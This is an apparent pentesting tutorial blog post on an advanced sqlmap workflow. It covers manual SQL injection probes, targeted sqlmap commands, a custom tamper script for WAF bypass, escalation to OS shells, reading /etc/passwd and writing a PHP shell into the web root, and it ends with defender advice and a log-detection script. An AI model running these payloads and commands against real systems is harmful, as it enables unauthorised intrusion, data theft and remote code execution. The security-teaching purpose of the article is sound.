sqlmap Advanced Workflow: From Identification to System Access

Manish Garg, Associate of (ISC)² · RingSafe
Apr 25, 2026
3 min read

Last updated: April 26, 2026

sqlmap is the canonical SQL injection automation tool. Most pentesters run it with default flags and accept whatever it produces. Senior practitioners use sqlmap as one stage in a workflow — manual identification of injectable parameters first, sqlmap for exploitation, custom tampering for WAF bypass, OS-level pivoting for command execution. This article covers the sqlmap workflow that produces actual findings, not just scan output.

The default trap

sqlmap -u 'target/page?id=1' --batch answers every prompt with the default and tests only the parameters it can see in the URL, with the default --level=1 and --risk=1 payload set. It does not test cookies (that needs --level 2), User-Agent and Referer (--level 3) or Host (--level 5), it cannot see body or JSON parameters it was not given, and it gets nothing useful from an endpoint that requires authentication. The senior workflow:

Stage 1: Manual identification

Before sqlmap, manually test for SQLi. Burp’s Active Scanner finds many; for the rest:

  • Append ' or " to parameters and watch for an error response; a raw DB error string also names the dialect
  • Test boolean conditions: 1 AND 1=1 must reproduce the baseline response, 1 AND 1=2 must differ from it
  • Test time-based, with the dialect's own delay: 1 AND SLEEP(5) on MySQL, 1; WAITFOR DELAY '0:0:5' on MSSQL, 1 AND 1=(SELECT 1 FROM pg_sleep(5)) on PostgreSQL; a reproducible delay is the signal, so repeat it before believing it
  • Test in headers (User-Agent, Referer, X-Forwarded-For), cookies, JSON body fields

Identify the parameter, the injection context (numeric, or inside a quoted string) and the dialect first. Then sqlmap exploits, with -p and --dbms stopping it from guessing.

Stage 2: sqlmap targeted exploitation

# Target a known-vulnerable parameter
sqlmap -u 'target/page?id=1' -p id --dbms=mysql --batch

# With authentication cookie
sqlmap -u 'target/page?id=1' --cookie='PHPSESSID=abc' --level=3 --risk=2

# POST body
sqlmap -u 'target/login' --data='user=admin&pass=test' -p user

# JSON body
sqlmap -u 'target/api' --data='{"id":1}' -p id

# Header injection: a custom header is not in sqlmap's default test set, so mark
# the injection point explicitly with * (the same marker works in --data and -r files)
sqlmap -u 'target/page' -H 'X-Forwarded-For: 1*'

# Full request from file (Burp save)
sqlmap -r request.txt -p id --batch

# Increase coverage: level 5 also tests cookies, User-Agent, Referer and Host;
# risk 3 adds OR-based payloads, which can modify data if the injection lands in
# an UPDATE or DELETE statement, so only use it where that is acceptable
sqlmap -u 'target/page?id=1' --level=5 --risk=3 --batch

Stage 3: Tamper for WAF bypass

WAFs match sqlmap's stock payloads and its default User-Agent. sqlmap ships with tamper scripts that mutate each payload before it is sent; pair them with --random-agent so the User-Agent does not give the run away:

# List available tampers
sqlmap --list-tampers

# Common bypasses
sqlmap -u 'target/page?id=1' --tamper=between,randomcase,space2comment

# Stacking tampers: sqlmap orders them by each script's __priority__, and every
# one must survive the target's parsing path. base64encode, for example, only
# works when the application base64-decodes the parameter itself, so it does not
# belong in a generic stack. Test each tamper alone before combining them.
sqlmap -u 'target/page?id=1' \
  --tamper=apostrophemask,charencode,equaltolike,space2comment
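A custom tamper script, written for this article (not one of sqlmap's bundled scripts), showing the interface --tamper expects: a module with a tamper(payload, **kwargs) function, an optional dependencies() hook and a __priority__ that decides ordering when several tampers are stacked. It folds three of the mutations above into one deterministic pass (space2comment, equaltolike and an alternating-case stand-in for randomcase) so the output is reproducible; the script path and target URL in the usage line are placeholders.

```python
#!/usr/bin/env python3
"""
Custom sqlmap tamper script (example written for this article, not a bundled
sqlmap tamper). In one pass, outside quoted strings only:
  1. '='          -> ' LIKE '          (what equaltolike does)
  2. SQL keywords -> AlTeRnAtInG case  (deterministic stand-in for randomcase)
  3. ' '          -> '/**/'            (what space2comment does)

Usage (script path is a placeholder):
  sqlmap -u 'target/page?id=1' --tamper=./article_tamper.py
"""
import re

try:  # available when sqlmap imports the script; fallback for stand-alone use
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0

# Keywords to recase; extend for the dialect you are attacking.
KEYWORDS = ("SELECT", "UNION", "ALL", "AND", "OR", "FROM", "WHERE",
            "ORDER", "BY", "NULL", "SLEEP", "LIKE")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)
# Split the payload into quoted strings, unquoted runs, and stray quotes.
SEGMENT_RE = re.compile(r"""'[^']*'|"[^"]*"|[^'"]+|['"]""")
# Plain '=' only; leave <=, >=, != and == alone.
EQUALS_RE = re.compile(r"(?<![<>!=])\s*=\s*(?!=)")


def dependencies():
    """sqlmap calls this once; use it to warn about DBMS or version assumptions."""
    pass


def _alternate_case(word):
    return "".join(c.lower() if i % 2 else c.upper() for i, c in enumerate(word))


def _mutate_unquoted(segment):
    segment = EQUALS_RE.sub(" LIKE ", segment)
    segment = KEYWORD_RE.sub(lambda m: _alternate_case(m.group(0)), segment)
    return segment.replace(" ", "/**/")


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload before the request is built."""
    if not payload:
        return payload
    # Quote tracking starts outside a string, exactly like sqlmap's own
    # space2comment, so a payload that first closes the application's string
    # (the 1' AND 'a'='a form) keeps the spaces inside what looks quoted.
    return "".join(
        seg if seg[0] in "'\"" else _mutate_unquoted(seg)
        for seg in SEGMENT_RE.findall(payload)
    )


if __name__ == "__main__":
    print(tamper("1 AND 1=1"))                        # 1/**/AnD/**/1/**/LiKe/**/1
    print(tamper("1 UNION ALL SELECT NULL,'x y'"))    # 1/**/UnIoN/**/AlL/**/SeLeCt/**/NuLl,'x y'
```

Run it stand-alone first (python3 article_tamper.py) and confirm the mutated payload still executes in the target dialect: /**/ is valid whitespace in MySQL, PostgreSQL and MSSQL, but LIKE changes semantics for non-string comparisons on some engines, which is the kind of thing that makes a blind technique silently stop working.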

Stage 4: Beyond data dumping — system access

Once sqlmap confirms SQL injection, several modes go further:

# Enumerate databases / tables / data
sqlmap -u 'target' --dbs
sqlmap -u 'target' -D <db> --tables
sqlmap -u 'target' -D <db> -T users --dump

# Get a SQL shell
sqlmap -u 'target' --sql-shell

# Get an OS shell. MySQL/PostgreSQL: sqlmap needs file-write privilege (FILE on
# MySQL with secure_file_priv permitting it, superuser on PostgreSQL) to drop a
# UDF library or a web stager; MSSQL: needs sysadmin to (re)enable xp_cmdshell
sqlmap -u 'target' --os-shell

# File read / write (same privilege requirements; --file-dest must be a path the
# DB process can write and the web server will serve)
sqlmap -u 'target' --file-read='/etc/passwd'
sqlmap -u 'target' --file-write=local.php --file-dest=/var/www/html/shell.php

For MSSQL with sysadmin privilege, either a single command or an interactive shell (--os-cmd and --os-shell are alternatives, not a pair):

sqlmap -u 'target' --os-cmd='whoami'
sqlmap -u 'target' --os-shell

If xp_cmdshell is disabled, sqlmap turns it back on through sp_configure (which is why sysadmin is required) and then runs commands as the SQL Server service account, so that account's rights bound what the shell can do.

Output processing

sqlmap keeps its session and results under ~/.local/share/sqlmap/output/<target>/: the request log, session.sqlite (which lets an interrupted run resume without re-detecting the injection) and a dump/ directory. Table dumps are written as CSV by default (--dump-format switches to HTML or SQLITE). For large dumps, --threads=N (maximum 10) parallelises requests, which mostly pays off for blind, inference-based extraction where every character costs several requests; combine it with --batch for an unattended run.

Defender perspective

  • WAF rules with sqlmap-specific signatures: the default User-Agent (sqlmap/<version> (https://sqlmap.org)) gives an unmodified run away; --random-agent hides it, the payload shapes do not.
  • Database-side: query patterns with characteristic UNION column probing (NULL,NULL,... with growing counts), suspicious WHERE clauses (AND 1=1 / AND 1=2 pairs), bursts of syntax errors from one client.
  • Web app logs: request patterns matching sqlmap's payload templates, including the inline-comment spacing and mixed-case keywords that tamper scripts leave behind.
  • Privilege: run the application's database account without FILE, superuser or sysadmin, keep xp_cmdshell disabled and set secure_file_priv; that is what turns an injection into a data finding rather than --os-shell.
  • Egress filtering: --os-shell itself tunnels through the injection and needs no outbound connection; what egress filtering stops is --os-pwn's reverse Metasploit payload and --dns-domain exfiltration.
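Detection logic for the web-log and User-Agent bullets above, run over a handful of constructed combined-format access-log lines. This is an added example for this article, not a production rule set: the log lines are made up and the rule names are mine. It URL-decodes the request, records inline-comment spacing, then normalises comments away before the keyword rules so tamper-mangled payloads are still caught, and finally counts hits per source IP, because one probe is noise and a burst is a scan.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines (made up for this example).
SAMPLE_LOG = """
10.0.0.5 - - [25/Apr/2026:10:00:01 +0530] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Apr/2026:10:00:02 +0530] "GET /page?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"
10.0.0.9 - - [25/Apr/2026:10:00:03 +0530] "GET /page?id=1%20AND%201%3D2 HTTP/1.1" 200 301 "-" "sqlmap/1.8 (https://sqlmap.org)"
10.0.0.9 - - [25/Apr/2026:10:00:04 +0530] "GET /page?id=1%2F**%2FUnIoN%2F**%2FSeLeCt%2F**%2FNULL,NULL-- HTTP/1.1" 500 112 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 - - [25/Apr/2026:10:00:05 +0530] "GET /page?id=1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [25/Apr/2026:10:00:06 +0530] "GET /search?q=pearl%20and%20oyster HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)   # stock User-Agent; absent with --random-agent
COMMENT_RE = re.compile(r"/\*.*?\*/")             # /**/ spacing left by space2comment
PAYLOAD_RULES = [
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("boolean-pair", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
    ("time-based", re.compile(r"\b(SLEEP\s*\(|WAITFOR\s+DELAY\b|PG_SLEEP\s*\()", re.I)),
    ("stacked-query", re.compile(r";\s*(SELECT|WAITFOR|EXEC|DROP|INSERT|UPDATE|DELETE)\b", re.I)),
]


def analyze(line):
    """Return one parsed entry with the rule names it trips, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None                                   # route unparsable lines elsewhere
    reasons = []
    if UA_RE.match(m["ua"]):
        reasons.append("sqlmap-ua")
    decoded = unquote_plus(m["path"])                 # %20 -> ' ', %3D -> '=', ...
    if COMMENT_RE.search(decoded):
        reasons.append("inline-comment-spacing")
    normalised = COMMENT_RE.sub(" ", decoded)         # restore spaces before keyword rules
    reasons += [name for name, rx in PAYLOAD_RULES if rx.search(normalised)]
    return {"ip": m["ip"], "path": decoded, "status": int(m["status"]), "reasons": reasons}


def scan(log_text):
    """Flagged entries only, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = analyze(line)
        if entry and entry["reasons"]:
            hits.append(entry)
    return hits


def suspicious_sources(log_text, threshold=3):
    """Source IPs with at least `threshold` flagged requests."""
    counts = Counter(h["ip"] for h in scan(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["reasons"], hit["path"])
    print(suspicious_sources(SAMPLE_LOG))             # {'10.0.0.9': 4}
```

The fourth and fifth sample lines carry a browser User-Agent and tamper-style casing, and are still caught by the payload rules after normalisation; the search query with the words "and" and "oyster" is not, because the boolean rule requires the numeric comparison shape. Feed the same rules the URL-decoded POST body and the headers sqlmap tests at higher levels, or the injection points in Stage 2 will never reach them.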

The takeaway

sqlmap is a power tool, not a magic wand. Identify the injection manually first; use sqlmap for systematic exploitation; layer tamper scripts for WAF bypass; pivot to system access where DB privileges allow. The workflow turns a SQL injection finding from “we have it” into a full database extraction or RCE.
